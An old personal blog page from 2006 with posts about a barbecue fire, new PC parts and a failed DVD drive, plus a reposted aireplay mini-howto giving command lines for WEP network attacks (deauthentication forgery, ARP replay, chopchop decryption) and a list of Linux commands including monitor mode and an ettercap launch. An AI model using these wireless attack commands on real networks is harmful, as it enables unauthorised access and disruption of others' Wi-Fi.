BBQ Fire 
Monday, March 27, 2006, 02:00 AM
So, uh, my BBQ caught fire while i was cooking some ribs.
No damage to the bbq, but it was still odd that i had to use baking soda to put it out. Man, thoes ribs must have been super greasy!


[ add comment ]   |  permalink  |  related link  |   ( 3 / 629 )
aireplay mini-howto 
Friday, March 24, 2006, 03:10 PM - Hacks
aireplay mini-howto

Example test setup:

* Acess Point (hostap) - 00:02:2D:AA:9C:13 , 10.0.0.1
* Wireless client (madwifi) - 00:09:5B:FC:21:F4 , 10.0.0.2
* Laptop with a Prism2 or Atheros of Prism54 card


0. Changes since last release
=============================

* built-in chopchop operation mode
* added a bunch of options in aireplay
* added deauthentication frame forgery
* Prism2 (wlan-ng) USB device support
* Atheros (madwifi) and Prism54 device support


1. Driver recompilation
=======================

1.1. Installing linux-wlan-ng-0.2.1-pre26
-----------------------------------------

First, make sure you have updated your card's station and primary
firmware with a recent version; I recommend STA 1.7.4 / PRI 1.1.1.

cd /usr/src
wget --passive-ftp ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/linux-wlan-ng-0.2.1-pre26.tar.bz2
tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2
cd linux-wlan-ng-0.2.1-pre26
patch -Np1 -i ~/aireplay-2.2/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
make config
make all
find /lib/modules \( -name p80211* -o -name prism2* \) -exec rm -v {} \;
make -C src install
cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/
mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/pcmcia restart
(reinsert card)


1.2. Installing madwifi
-----------------------

Note: a tarball is also available at http://madwifi.otaku42.de/

cd /usr/src
cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/madwifi co madwifi
cd madwifi
patch -Np1 -i ~/aireplay-2.2/patch/madwifi-20050309.patch.0.1
make
make install
modprobe ath_pci


1.3. Installing prism54
-----------------------

Make sure the hotplug package is installed and hotplug firmware
loading support is present in your kernel (module firmware_class).

cd /usr/src
wget http://prism54.org/pub/linux/snapshot/t ... st.tar.bz2
tar -xvjf prism54-svn-latest.tar.bz2
cd prism54-svn-latest
make modules
make install
mkdir -p /usr/lib/hotplug/firmware
wget http://prism54.org/~mcgrof/firmware/1.0.4.3.arm
mv 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
modprobe prism54


2. Using aireplay
=================

*** aireplay does not capture replies: ***
*** you must start airodump in parallel ***

If you use madwifi, you may have to place the card in
pure 802.11b mode first:

iwpriv ath0 mode 2

If you use wlan-ng, run ./wlanng.sh start wlan0 <channel>
Otherwise run:

iwconfig ath0 mode Monitor channel <channel>
ifconfig ath0 up


2.1. Attack 1: deauthentication
-------------------------------

This attack is especially useful to capture an ESSID or a WPA handshake.

./airforge 00:02:2D:AA:9C:13 00:09:5B:FC:21:F4 deauth.pcap
./aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.pcap ath0


2.2. Attack 2: classic arp-request resend
-----------------------------------------

./aireplay -f 0 -t 1 -m 68 -n 68 -d FF:FF:FF:FF:FF:FF ath0


2.3. Attack 3: data broadcast resend
------------------------------------

This attack is quite unreliable and often doesn't work. You need
the MAC address of an authenticated station so that the AP will
not drop the packets. As most APs work in open authentication mode,
if you have another wireless card, you can simply associate it
and use its MAC address.

./aireplay -h 00:09:5B:FC:21:F4 -c FF:FF:FF:FF:FF:FF -o 08 -p 41 ath0


2.4. Attack 4: arp-request forgery
----------------------------------

First, we need a prga by decrypting a data packet. For this, add the -k
flag which will enable KoreK's chopchop attack:

./aireplay -k eth1

This attack may not work in deauthenticated mode (in which the source
MAC address is forged). If this is the case, you will have the pass the
address of an authenticated station:

./aireplay -h 00:09:5B:FC:21:F4 -k eth1

Have a look at the decrypted packet:

tcpdump -e -n -t -r replay_dec-050320-023844.pcap

BSSID:00:02:2d:aa:9c:13 SA:00:09:5b:fc:21:f4 DA:00:05:1b:44:8a:ce LLC, dsap
SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03, IP 10.0.0.2.32774 > 10.0.0.3.22: S
2961438793:2961438793(0) win 5840 <mss 1460,sackOK,...>

Now we have enough information to forge an ARP request:

./airforge replay_dec-050320-023844.prga 1 00:02:2d:aa:9c:13 \
00:09:5b:fc:21:f4 10.0.0.2 10.0.0.3 arp.pcap

And finally:

./aireplay -r arp.pcap ath0



[ add comment ]   |  permalink  |  related link  |   ( 3 / 1177 )
Abbey's First Code Red 
Thursday, March 23, 2006, 07:48 PM - Family
Ah, she's growing up so fast!
Here is a picture of her and her first drink of Mt. Dew!
yay!


[ 1 comment ] ( 9 views )   |  permalink  |  related link  |   ( 3 / 872 )
Computer Parts 
Thursday, March 23, 2006, 04:47 PM - Computers
My Computer parts came. (the rest of them anyways)

i2tb came over and helped me assemble my machine.
Things installed and went well withough a hitch. he only problem i had was the partitions on my hard drive got a bit messed up. So i had to install a 10 gig to get everything fixed.

Night.

i started the Lan party off ok, got slaughtered to start off with on AOE 3.

DoD: source.
Heh, ya, wooped up on everyone good. 84 to 43... hehe. They didn't stand a chance. pop, G's dead. :)

[ add comment ]   |  permalink  |  related link  |   ( 3.1 / 336 )
Linux Commands 
Thursday, March 23, 2006, 01:23 PM - Other
I am very forgetful, so i have been keeping a text file with a bunch or "useful" commands.

yes, i realize that a "manual" will give me info, but hell, who has time to decypher and test to see which switch will give you the right thing?
So, here are real world usages.

(shutup, this list is like 2 years old. i had to start somewhere)

Jump Drive:
mount -t vfat /dev/sda1 /mnt/jump

Ether Adpter
ifconfig eth0 down
ifconfig eth0 up

ip address
ifconfig -a

Renew (red hat or fedora)
/etc/init.d/
./network start
pump
dhcpcd

Directory Delete
rm -rf mydirectory

to check what files a package owns, use rpm -ql <packagename>

Check for available Access Points
# ifconfig ath0 up
# iwlist ath0 scan

adduser

Linux:# cd madwifi
Linux:# insmod wlan/wlan.o
Linux:# insmod ath_hal/ath_hal.o
Linux:# insmod driver/ath_pci.o

Linux:# ifconfig ath0 up
Linux:# iwconfig ath0 mode monitor

iwconfig ath0 scan

tar xzvf file
x for extract z for gzip v for verbose f for filename

make menuconfig

Assign required information to connect to your access point

# iwconfig ath0 essid ""

Jump Drive Removal
sync ; sync

Kismet color codes:
red = factory default
yellow = wep disabled
green = wep enabled
blue = uncloaked network

autorun stuff

chkconfig

ettercap -G -d -i ath0

Set card to monitor (atheros)
iwconfig ath0 mode monitor

Linux file transfer:

scp /root/dump.cap 192.168.1.103:~/

Mount remote Directory
smbmount //192.168.1.103/sharename /mnt/serve

GPS

Serial: gpsd -p /dev/ttys0 -n -s 4800
USB: gpsd -p /dev/ttyUSB0

process Id's

ps -A


-fix label fonts in gpsmap

ln -s /usr/share/ghostscript/fonts/n019003l.pfb
/usr/share/fonts/type1/gsfonts/n019003l.pfb

[11:41am] <logikal^> type screen, do what you want, hit ctrl-a ctrl-d, exit
[11:41am] <logikal^> then you come back from another computer and do screen -x or screen -r

to run in background
wget &

.chanset #teamvatican chanmode -t
.chanset #chan ban-time 0

running text file
tail -f error.txt

scrot -d5 year-month-day.png

gnome-control-center

[ add comment ]   |  permalink  |  related link  |   ( 3 / 349 )
Newegg, how i love thee 
Monday, March 20, 2006, 02:58 PM
New computer parts on order. I will post pics when things start to show up.

CASE ANTEC|P180 SIL RT - Retail
FD 1.44MB|SAMSUNG SFD321B/LEB% Beg - OEM <-- free
ADPT|SABRENT SATA2IDE|SBT-SCIDE R - Retail
MB ASUS A8N-SLI Premium NF4SLI 939 - Retail
VGA EVGA N 6800GS 256-P2-N391-AX R - Retail
PSU TT | W0070 430W RTL - Retail
CPU AMD|ATHLON 64 3700+ 2.2G 939P R - Retail
DVD BURN PIONEER|DVR-111D BLACK% - OEM

Price: More than i was planning on spending. Thank you wifey! :)

[ add comment ]   |  permalink  |  related link  |   ( 3 / 513 )
R.I.P. DVD-RW 
Friday, March 17, 2006, 02:22 PM - Rants
I had the pleasure of downloading a new DVD image and was excited to try it out on my laptop. I slap a blank DVD-R in the drive and hit burn.... but wait, its saying i don't have a disc in the drive... :s
Long story short, my drive no longer recognizes dvd'd...r, rw, commercial... anything. The cd's still work fine, so i am thinking the DVD laser has crapped out on it.

I went to the Cendyne webpage (its a NEC-1400 DVD writer repackaged as a cendyne drive) and look what i found

http://www.cendyne.com/FAQ.asp?Page=main
Cendyne will no longer provide support for product purchased prior to 3/17/2006. If you are within this warranty period, have an open incident, or open RMA our technical support staff will respond to your inquiries using our online technical support form.

the date changes everyday to reflect the current day, so basicly they are saying that the second you walk of the store, its no longer supported. I will not be buying anything from them ever again.

As a result of the drive dying, it was the straw that broke the camels back... and a whole new setup is in the near future.

Farewell DVD-RW, you will be missed (until i get my new one). Thank you for the many hundreds of DVD's you have burned for me, not to mention the many more spindles of CD's burned for me too.

-=x=-


[ add comment ]   |  permalink  |  related link  |   ( 3 / 770 )

Back Next